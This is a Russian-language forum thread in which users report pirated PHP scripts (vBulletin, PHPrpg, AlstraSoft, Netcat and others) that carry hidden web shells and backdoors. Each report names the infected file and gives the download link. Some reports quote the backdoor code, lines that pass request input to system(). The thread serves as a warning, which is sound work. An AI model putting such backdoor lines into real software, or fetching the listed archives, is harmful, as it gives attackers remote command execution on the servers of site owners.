![]() |
Затрояненные скрипты.
Выкладываем сюда, все скрипты в которые встроенны черные ходы, шеллы, маячки и т.д.
В формате: 1) Название скрипта 2) Файлы которые заражены. 3) Сайт откуда был скачен скрипт. |
1) Vbulletin 3.6.1 занулен SCRiPTMAFiA
2) includes/class_dm_announcement.php Встроен nst шелл. 3) http://s3m.ru/files/VBulletinv361_PHP_NULL.zip |
1) PHPrpg
2) leap.php весь файл это php remview шелл 3) http://rapidshare.de/files/25349919/phprpg.rar |
1) Strike Project
2) leap.php весь файл это php remview шелл 3) http://rapidshare.de/files/25350055/strikerpg.rar Как и предыдущий скрипт, выложены в скрипт-паке он-лайн игр |
1) AlstraSoft.Template.Seller.Pro v3.21.PHP.NULL-WDYL
2) include/adodb/adodb-connetcion.inc.php содержит строки ADOConnection::outp( "CacheFlush: $cmd<br><pre>\n", system($cmd),"</pre>"); 3) Был взят из какого-то cms пака. 1) Netcat standart 2.3 2) netcat/admin/dump.inc.php содержит код system($cmd); 3) скачан из cms пака от monsterteam.info |
Извиняюсь, конечно за оффтоп, но нельзя ли бы указывать полную инфу...
Например: Цитата:
|
| Время: 22:37 |